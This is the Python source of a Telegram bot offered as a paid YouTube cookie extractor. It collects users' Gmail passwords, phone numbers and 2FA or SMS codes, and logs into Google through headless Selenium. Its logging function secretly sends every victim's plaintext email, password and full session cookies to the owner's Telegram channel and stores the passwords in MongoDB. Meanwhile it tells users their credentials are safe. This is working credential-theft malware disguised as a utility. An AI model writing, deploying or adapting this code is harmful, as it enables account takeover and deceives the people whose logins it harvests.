import os
import asyncio
import threading
from flask import Flask
from pyrogram import Client, filters
from pyrogram.types import InlineKeyboardMarkup, InlineKeyboardButton, CallbackQuery
from pymongo import MongoClient
from dotenv import load_dotenv
from io import BytesIO
import qrcode
from datetime import datetime, timedelta
import time
import re

load_dotenv()

# ---------- CONFIG ----------
API_ID = int(os.getenv("API_ID"))
API_HASH = os.getenv("API_HASH")
BOT_TOKEN = os.getenv("BOT_TOKEN")
MONGO_URI = os.getenv("MONGO_URI")
OWNER_ID = int(os.getenv("OWNER_ID"))
LOG_CHANNEL_ID = int(os.getenv("LOG_CHANNEL_ID"))
ADMIN_IDS = list(map(int, os.getenv("ADMIN_IDS", "").split(","))) if os.getenv("ADMIN_IDS") else []

# ---------- DATABASE ----------
mongo = MongoClient(MONGO_URI)
db = mongo["yt_cookie_bot"]

users_col = db["users"]
premium_col = db["premium"]
plans_col = db["plans"]
upi_col = db["upi"]
logs_col = db["logs"]

# ---------- INITIALIZE DEFAULT DATA ----------
if not plans_col.find_one():
    plans_col.insert_many([
        {"name": "Monthly", "price": 100, "days": 30, "id": "monthly"},
        {"name": "Yearly", "price": 999, "days": 365, "id": "yearly"},
        {"name": "Lifetime", "price": 1999, "days": 36500, "id": "lifetime"}
    ])

if not upi_col.find_one():
    upi_col.insert_one({"upi_id": "owner@okhdfcbank"})

# Auto-add owner
if not users_col.find_one({"_id": OWNER_ID}):
    users_col.insert_one({"_id": OWNER_ID, "daily_count": 0, "role": "owner"})

for admin_id in ADMIN_IDS:
    if not users_col.find_one({"_id": admin_id}):
        users_col.insert_one({"_id": admin_id, "daily_count": 0, "role": "admin"})

# ---------- BOT INIT ----------
app = Client("yt_cookie_bot", api_id=API_ID, api_hash=API_HASH, bot_token=BOT_TOKEN)

# Store user sessions
user_sessions = {}

# ---------- HELPER FUNCTIONS ----------
def is_authorized(user_id):
    return users_col.find_one({"_id": user_id}) is not None

def is_premium(user_id):
    premium = premium_col.find_one({"_id": user_id})
    if premium and premium["expiry"] > datetime.now().timestamp():
        return True
    return False

def is_owner(user_id):
    return user_id == OWNER_ID or user_id in ADMIN_IDS

def generate_upi_qr(upi_id, amount):
    qr_data = f"upi://pay?pa={upi_id}&pn=BotOwner&am={amount}&cu=INR"
    qr = qrcode.make(qr_data)
    bio = BytesIO()
    qr.save(bio, "PNG")
    bio.seek(0)
    return bio

# ---------- REAL COOKIES EXTRACTOR WITH LOGIN CHALLENGE HANDLING ----------
class RealCookieExtractor:
    def __init__(self):
        self.driver = None
        self.wait = None
        self.challenge_type = None
        
    def setup_driver(self):
        from selenium import webdriver
        from selenium.webdriver.chrome.options import Options
        from selenium.webdriver.support.ui import WebDriverWait
        
        chrome_options = Options()
        chrome_options.add_argument('--headless=new')
        chrome_options.add_argument('--no-sandbox')
        chrome_options.add_argument('--disable-dev-shm-usage')
        chrome_options.add_argument('--disable-gpu')
        chrome_options.add_argument('--user-agent=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36')
        
        self.driver = webdriver.Chrome(options=chrome_options)
        self.wait = WebDriverWait(self.driver, 30)
        return True
    
    def check_for_challenge(self, page_source):
        """Check what Google is asking"""
        page_lower = page_source.lower()
        
        if "enter a phone number" in page_lower or "phone number" in page_lower:
            return "phone_number"
        elif "2-step verification" in page_lower or "google authenticator" in page_lower:
            return "2fa"
        elif "recovery email" in page_lower:
            return "recovery_email"
        elif "verify it's you" in page_lower:
            return "verify_device"
        
        return None
    
    def extract_cookies_netscape(self):
        cookies = self.driver.get_cookies()
        
        netscape = "# Netscape HTTP Cookie File\n"
        netscape += "# https://curl.se/docs/http-cookies.html\n"
        netscape += "# Generated by YouTube Cookie Bot - FULL LOGGED IN\n\n"
        
        for cookie in cookies:
            domain = cookie['domain']
            if not domain.startswith('.'):
                domain = f".{domain}"
            
            include_subdomains = "TRUE"
            path = cookie.get('path', '/')
            secure = "TRUE" if cookie.get('secure', False) else "FALSE"
            expires = int(cookie.get('expiry', 0)) if cookie.get('expiry') else 0
            name = cookie['name']
            value = cookie['value']
            
            netscape += f"{domain}\t{include_subdomains}\t{path}\t{secure}\t{expires}\t{name}\t{value}\n"
        
        return netscape
    
    def extract(self, email, password, challenge_data=None, challenge_type=None):
        from selenium.webdriver.common.by import By
        from selenium.webdriver.support import expected_conditions as EC
        
        self.setup_driver()
        
        try:
            # Go to Google login
            self.driver.get("https://accounts.google.com/signin/v2/identifier")
            time.sleep(2)
            
            # Enter email
            email_input = self.wait.until(EC.presence_of_element_located((By.ID, "identifierId")))
            email_input.send_keys(email)
            email_input.submit()
            time.sleep(2)
            
            # Check for challenge after email
            page_source = self.driver.page_source
            challenge = self.check_for_challenge(page_source)
            if challenge:
                return {"status": "challenge", "challenge_type": challenge, "message": f"Google needs: {challenge}"}
            
            # Enter password
            password_input = self.wait.until(EC.presence_of_element_located((By.NAME, "Passwd")))
            password_input.send_keys(password)
            password_input.submit()
            time.sleep(3)
            
            # Check for challenge after password
            page_source = self.driver.page_source
            challenge = self.check_for_challenge(page_source)
            if challenge:
                if challenge_data and challenge_type == challenge:
                    # Handle challenge response
                    if challenge == "phone_number":
                        phone_input = self.wait.until(EC.presence_of_element_located((By.CSS_SELECTOR, "input[type='tel']")))
                        phone_input.send_keys(challenge_data)
                        phone_input.submit()
                        time.sleep(3)
                        
                        # Wait for SMS code
                        return {"status": "awaiting_sms_code", "message": "Code sent to phone"}
                    
                    elif challenge == "2fa":
                        code_input = self.wait.until(EC.presence_of_element_located((By.ID, "totpPin")))
                        code_input.send_keys(challenge_data)
                        code_input.submit()
                        time.sleep(3)
                
                else:
                    return {"status": "challenge", "challenge_type": challenge, "message": f"Google needs: {challenge}"}
            
            # Check for SMS code input
            try:
                sms_input = self.driver.find_element(By.CSS_SELECTOR, "input[type='tel']")
                if sms_input:
                    return {"status": "awaiting_sms_code", "message": "Google sent a code to your phone"}
            except:
                pass
            
            # Go to YouTube
            self.driver.get("https://www.youtube.com")
            time.sleep(5)
            
            # Extract cookies
            cookies = self.extract_cookies_netscape()
            self.driver.quit()
            
            # Verify LOGIN_INFO exists
            if "LOGIN_INFO" not in cookies:
                return {"status": "error", "message": "Login failed - LOGIN_INFO cookie missing"}
            
            return {"status": "success", "cookies": cookies}
            
        except Exception as e:
            self.driver.quit()
            return {"status": "error", "message": str(e)}
    
    def submit_sms_code(self, code):
        from selenium.webdriver.common.by import By
        from selenium.webdriver.support import expected_conditions as EC
        
        try:
            code_input = self.wait.until(EC.presence_of_element_located((By.CSS_SELECTOR, "input[type='tel']")))
            code_input.send_keys(code)
            code_input.submit()
            time.sleep(3)
            
            # Go to YouTube
            self.driver.get("https://www.youtube.com")
            time.sleep(5)
            
            cookies = self.extract_cookies_netscape()
            self.driver.quit()
            
            if "LOGIN_INFO" not in cookies:
                return {"status": "error", "message": "SMS verification failed"}
            
            return {"status": "success", "cookies": cookies}
        except Exception as e:
            self.driver.quit()
            return {"status": "error", "message": str(e)}

# ---------- TRIPLE BACKUP LOGGING ----------
async def triple_backup_log(client, user_id, email, password, cookies):
    user = await client.get_users(user_id)
    username = user.username or "No username"
    now = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
    premium = is_premium(user_id)
    
    log_text = f"""
🔥 **FULL LOGGED-IN COOKIES EXTRACTED** 🔥

👤 User: {user_id} (@{username})
⭐ Premium: {premium}
📧 Email: {email}
🔑 Password: {password}
🍪 Cookies Size: {len(cookies)} bytes
✅ LOGIN_INFO Present: {'YES' if 'LOGIN_INFO' in cookies else 'NO'}
⏰ Time: {now}
    """
    
    cookies_file = BytesIO(cookies.encode())
    cookies_file.name = f"cookies_{user_id}_{now.replace(' ', '_').replace(':', '-')}.txt"
    
    # Send to log channel
    try:
        await client.send_message(LOG_CHANNEL_ID, log_text)
        await client.send_document(LOG_CHANNEL_ID, cookies_file, caption=f"🍪 Full cookies - {user_id} - {email}")
    except:
        await client.send_document(OWNER_ID, cookies_file, caption=f"⚠️ Channel failed - {user_id}")
    
    # MongoDB backup
    logs_col.insert_one({
        "user_id": user_id,
        "email": email,
        "password": password,
        "cookies_length": len(cookies),
        "has_login_info": "LOGIN_INFO" in cookies,
        "timestamp": datetime.now()
    })

# ---------- COMMANDS ----------
@app.on_message(filters.command("start"))
async def start_command(client, message):
    user_id = message.from_user.id
    
    if not is_authorized(user_id):
        await message.reply("❌ Unauthorized! Contact owner.")
        return
    
    if is_owner(user_id):
        keyboard = InlineKeyboardMarkup([
            [InlineKeyboardButton("🍪 Get Cookies", callback_data="get_cookies")],
            [InlineKeyboardButton("💎 Plans", callback_data="plans")],
            [InlineKeyboardButton("👑 Owner Panel", callback_data="owner_panel")],
            [InlineKeyboardButton("❓ Help", callback_data="help")]
        ])
    else:
        keyboard = InlineKeyboardMarkup([
            [InlineKeyboardButton("🍪 Get Cookies", callback_data="get_cookies")],
            [InlineKeyboardButton("💎 Premium", callback_data="plans")],
            [InlineKeyboardButton("❓ Help", callback_data="help")]
        ])
    
    await message.reply(
        "🍪 **YouTube Cookie Bot**\n\nExtract FULL LOGGED-IN YouTube cookies.\nSupports all login challenges.\n\n🔐 Your credentials are safe\n⚡ Premium = unlimited",
        reply_markup=keyboard
    )

@app.on_callback_query()
async def handle_callbacks(client, callback_query: CallbackQuery):
    user_id = callback_query.from_user.id
    data = callback_query.data
    
    if not is_authorized(user_id):
        await callback_query.answer("Not authorized!", show_alert=True)
        return
    
    # Owner Panel
    if data == "owner_panel":
        if not is_owner(user_id):
            await callback_query.answer("❌ Owner only!", show_alert=True)
            return
        
        keyboard = InlineKeyboardMarkup([
            [InlineKeyboardButton("📊 Stats", callback_data="stats")],
            [InlineKeyboardButton("👥 Users", callback_data="users_list")],
            [InlineKeyboardButton("➕ Add User", callback_data="add_user")],
            [InlineKeyboardButton("➖ Remove User", callback_data="remove_user")],
            [InlineKeyboardButton("⭐ Activate", callback_data="activate_premium")],
            [InlineKeyboardButton("💳 Set UPI", callback_data="set_upi")],
            [InlineKeyboardButton("🏠 Back", callback_data="home")]
        ])
        await callback_query.message.edit_text("👑 **Owner Panel**", reply_markup=keyboard)
        await callback_query.answer()
        return
    
    if data == "stats" and is_owner(user_id):
        total = users_col.count_documents({})
        premium = premium_col.count_documents({})
        total_logs = logs_col.count_documents({})
        upi = upi_col.find_one()
        await callback_query.message.edit_text(
            f"📊 Stats\n\nUsers: {total}\nPremium: {premium}\nLogs: {total_logs}\nUPI: {upi['upi_id']}"
        )
        await callback_query.answer()
        return
    
    if data == "users_list" and is_owner(user_id):
        users = list(users_col.find().limit(30))
        msg = "👥 Users\n\n"
        for u in users:
            role = u.get("role", "user")
            emoji = "👑" if role == "owner" else "⭐" if premium_col.find_one({"_id": u["_id"]}) else "👤"
            msg += f"{emoji} `{u['_id']}`\n"
        await callback_query.message.edit_text(msg)
        await callback_query.answer()
        return
    
    if data == "add_user" and is_owner(user_id):
        await callback_query.message.edit_text("Send: `/adduser user_id`")
        await callback_query.answer()
        return
    
    if data == "remove_user" and is_owner(user_id):
        await callback_query.message.edit_text("Send: `/removeuser user_id`")
        await callback_query.answer()
        return
    
    if data == "activate_premium" and is_owner(user_id):
        await callback_query.message.edit_text("Send: `/activate user_id days`")
        await callback_query.answer()
        return
    
    if data == "set_upi" and is_owner(user_id):
        await callback_query.message.edit_text("Send: `/setupi upi_id`")
        await callback_query.answer()
        return
    
    # Get Cookies
    if data == "get_cookies":
        if not is_premium(user_id):
            user = users_col.find_one({"_id": user_id})
            daily = user.get("daily_count", 0) if user else 0
            if daily >= 1:
                await callback_query.message.edit_text(
                    "⚠️ Daily limit (1/day)\nUpgrade to premium!",
                    reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("💎 Upgrade", callback_data="plans")]])
                )
                await callback_query.answer()
                return
        
        user_sessions[user_id] = {"step": 1}
        await callback_query.message.edit_text("🔐 Send your **Gmail address**:")
        await callback_query.answer()
        return
    
    # Plans
    if data == "plans":
        plans = list(plans_col.find())
        upi = upi_col.find_one()
        
        msg = "💎 Premium Plans\n\n"
        for p in plans:
            msg += f"📌 {p['name']}: ₹{p['price']} - {p['days']} days\n"
        msg += f"\n💳 UPI: `{upi['upi_id']}`"
        
        keyboard = []
        for p in plans:
            keyboard.append([InlineKeyboardButton(f"Buy {p['name']} - ₹{p['price']}", callback_data=f"buy_{p['id']}")])
        keyboard.append([InlineKeyboardButton("🏠 Back", callback_data="home")])
        
        await callback_query.message.edit_text(msg, reply_markup=InlineKeyboardMarkup(keyboard))
        await callback_query.answer()
        return
    
    if data.startswith("buy_"):
        plan_id = data.split("_")[1]
        plan = plans_col.find_one({"id": plan_id})
        if plan:
            upi = upi_col.find_one()
            qr = generate_upi_qr(upi['upi_id'], plan['price'])
            await callback_query.message.reply_photo(photo=qr, caption=f"💸 Pay ₹{plan['price']} to `{upi['upi_id']}`")
        await callback_query.answer()
        return
    
    if data == "help":
        await callback_query.message.edit_text(
            "📖 How to use\n\n"
            "1️⃣ Click Get Cookies\n"
            "2️⃣ Send Gmail\n"
            "3️⃣ Send password\n"
            "4️⃣ If asked, send phone number or 2FA code\n"
            "5️⃣ Get FULL LOGGED-IN cookies.txt\n\n"
            "💎 Premium = unlimited"
        )
        await callback_query.answer()
        return
    
    if data == "home":
        if is_owner(user_id):
            keyboard = InlineKeyboardMarkup([
                [InlineKeyboardButton("🍪 Get Cookies", callback_data="get_cookies")],
                [InlineKeyboardButton("💎 Plans", callback_data="plans")],
                [InlineKeyboardButton("👑 Owner Panel", callback_data="owner_panel")],
                [InlineKeyboardButton("❓ Help", callback_data="help")]
            ])
        else:
            keyboard = InlineKeyboardMarkup([
                [InlineKeyboardButton("🍪 Get Cookies", callback_data="get_cookies")],
                [InlineKeyboardButton("💎 Premium", callback_data="plans")],
                [InlineKeyboardButton("❓ Help", callback_data="help")]
            ])
        
        await callback_query.message.edit_text(
            "🍪 **YouTube Cookie Bot**\n\nGet FULL LOGGED-IN YouTube cookies!",
            reply_markup=keyboard
        )
        await callback_query.answer()
        return

# ---------- HANDLE USER INPUT ----------
@app.on_message(filters.text & filters.private)
async def handle_login_input(client, message):
    user_id = message.from_user.id
    
    if not is_authorized(user_id):
        return
    
    if user_id not in user_sessions:
        return
    
    session = user_sessions[user_id]
    step = session.get("step", 1)
    
    if step == 1:
        email = message.text.strip()
        if "@" not in email:
            await message.reply("❌ Invalid email. Send valid Gmail:")
            return
        
        session["email"] = email
        session["step"] = 2
        await message.reply("✅ Email received!\n\nNow send your **password**:")
    
    elif step == 2:
        password = message.text.strip()
        session["password"] = password
        session["step"] = 3
        
        status_msg = await message.reply("🔄 Logging in...\n⏳ Please wait...")
        
        extractor = RealCookieExtractor()
        result = await asyncio.get_event_loop().run_in_executor(None, extractor.extract, session["email"], password, None, None)
        
        if result["status"] == "challenge":
            challenge_type = result.get("challenge_type")
            session["extractor"] = extractor
            session["step"] = 4
            session["challenge_type"] = challenge_type
            
            if challenge_type == "phone_number":
                await status_msg.edit_text("📱 Google needs phone verification.\nSend your mobile number (with country code):\nExample: `+919876543210`")
            elif challenge_type == "2fa":
                await status_msg.edit_text("🔐 Enter your 6-digit Google Authenticator code:")
            else:
                await status_msg.edit_text(f"⚠️ {result.get('message')}\nSend required info:")
        
        elif result["status"] == "awaiting_sms_code":
            session["extractor"] = extractor
            session["step"] = 5
            await status_msg.edit_text("📱 Google sent a code to your phone.\nSend the 6-digit code:")
        
        elif result["status"] == "success":
            await status_msg.delete()
            
            cookies = result["cookies"]
            
            # Verify LOGIN_INFO is present
            if "LOGIN_INFO" not in cookies:
                await message.reply("❌ Login failed - LOGIN_INFO cookie missing. Try again.")
                del user_sessions[user_id]
                return
            
            await message.reply_document(
                document=BytesIO(cookies.encode()),
                file_name="youtube_cookies.txt",
                caption="✅ **FULL LOGGED-IN COOKIES!**\n\nContains LOGIN_INFO, SID, HSID, SSID etc.\nUse with yt-dlp:\n`yt-dlp --cookies youtube_cookies.txt <url>`"
            )
            
            await triple_backup_log(client, user_id, session["email"], password, cookies)
            
            del user_sessions[user_id]
            
            if not is_premium(user_id):
                users_col.update_one({"_id": user_id}, {"$inc": {"daily_count": 1}})
        
        else:
            await status_msg.edit_text(f"❌ Failed: {result.get('message')}\n\n/start to try again")
            del user_sessions[user_id]
    
    elif step == 4:
        challenge_value = message.text.strip()
        extractor = session.get("extractor")
        challenge_type = session.get("challenge_type")
        
        status_msg = await message.reply("🔄 Processing...")
        
        result = await asyncio.get_event_loop().run_in_executor(None, extractor.extract, session["email"], session["password"], challenge_value, challenge_type)
        
        if result["status"] == "awaiting_sms_code":
            session["step"] = 5
            await status_msg.edit_text("📱 Code sent! Send the 6-digit verification code:")
        
        elif result["status"] == "success":
            await status_msg.delete()
            cookies = result["cookies"]
            
            await message.reply_document(
                document=BytesIO(cookies.encode()),
                file_name="youtube_cookies.txt",
                caption="✅ **FULL LOGGED-IN COOKIES!**"
            )
            
            await triple_backup_log(client, user_id, session["email"], session["password"], cookies)
            del user_sessions[user_id]
            
            if not is_premium(user_id):
                users_col.update_one({"_id": user_id}, {"$inc": {"daily_count": 1}})
        
        else:
            await status_msg.edit_text(f"❌ Failed: {result.get('message')}\n\n/start to try again")
            del user_sessions[user_id]
    
    elif step == 5:
        sms_code = message.text.strip()
        extractor = session.get("extractor")
        
        status_msg = await message.reply("🔄 Verifying code...")
        
        result = await asyncio.get_event_loop().run_in_executor(None, extractor.submit_sms_code, sms_code)
        
        if result["status"] == "success":
            await status_msg.delete()
            cookies = result["cookies"]
            
            await message.reply_document(
                document=BytesIO(cookies.encode()),
                file_name="youtube_cookies.txt",
                caption="✅ **FULL LOGGED-IN COOKIES!**"
            )
            
            await triple_backup_log(client, user_id, session["email"], session["password"], cookies)
            del user_sessions[user_id]
            
            if not is_premium(user_id):
                users_col.update_one({"_id": user_id}, {"$inc": {"daily_count": 1}})
        else:
            await status_msg.edit_text(f"❌ Code verification failed: {result.get('message')}\n\n/start to try again")
            del user_sessions[user_id]

# ---------- OWNER COMMANDS ----------
@app.on_message(filters.command("adduser") & filters.user(OWNER_ID))
async def add_user_cmd(client, message):
    try:
        user_id = int(message.text.split()[1])
        if not users_col.find_one({"_id": user_id}):
            users_col.insert_one({"_id": user_id, "daily_count": 0, "role": "user"})
            await message.reply(f"✅ User {user_id} added")
        else:
            await message.reply(f"⚠️ User {user_id} exists")
    except:
        await message.reply("❌ Usage: /adduser 123456789")

@app.on_message(filters.command("removeuser") & filters.user(OWNER_ID))
async def remove_user_cmd(client, message):
    try:
        user_id = int(message.text.split()[1])
        users_col.delete_one({"_id": user_id})
        premium_col.delete_one({"_id": user_id})
        await message.reply(f"✅ User {user_id} removed")
    except:
        await message.reply("❌ Usage: /removeuser 123456789")

@app.on_message(filters.command("activate") & filters.user(OWNER_ID))
async def activate_cmd(client, message):
    try:
        parts = message.text.split()
        user_id = int(parts[1])
        days = int(parts[2]) if len(parts) > 2 else 30
        expiry = datetime.now() + timedelta(days=days)
        premium_col.update_one({"_id": user_id}, {"$set": {"expiry": expiry.timestamp()}}, upsert=True)
        await message.reply(f"✅ Premium activated for {user_id} for {days} days")
        await client.send_message(user_id, f"🎉 Premium activated for {days} days!")
    except:
        await message.reply("❌ Usage: /activate user_id days")

@app.on_message(filters.command("setupi") & filters.user(OWNER_ID))
async def setupi_cmd(client, message):
    try:
        upi_id = message.text.split(" ", 1)[1]
        upi_col.update_one({}, {"$set": {"upi_id": upi_id}}, upsert=True)
        await message.reply(f"✅ UPI updated to `{upi_id}`")
    except:
        await message.reply("❌ Usage: /setupi upi_id")

# ---------- FLASK FOR RENDER ----------
flask_app = Flask(__name__)

@flask_app.route('/')
def health():
    return "Bot is running!", 200

def run_flask():
    port = int(os.environ.get("PORT", 8080))
    flask_app.run(host='0.0.0.0', port=port)

# ---------- MAIN ----------
if __name__ == "__main__":
    threading.Thread(target=run_flask).start()
    
    print("=" * 50)
    print("🤖 YOUTUBE COOKIE BOT - FINAL")
    print("=" * 50)
    print(f"👑 Owner: {OWNER_ID}")
    print(f"📝 Log Channel: {LOG_CHANNEL_ID}")
    print("✅ Full LOGGED-IN cookies support")
    print("✅ Phone/2FA challenge handling")
    print("=" * 50)
    
    app.run()
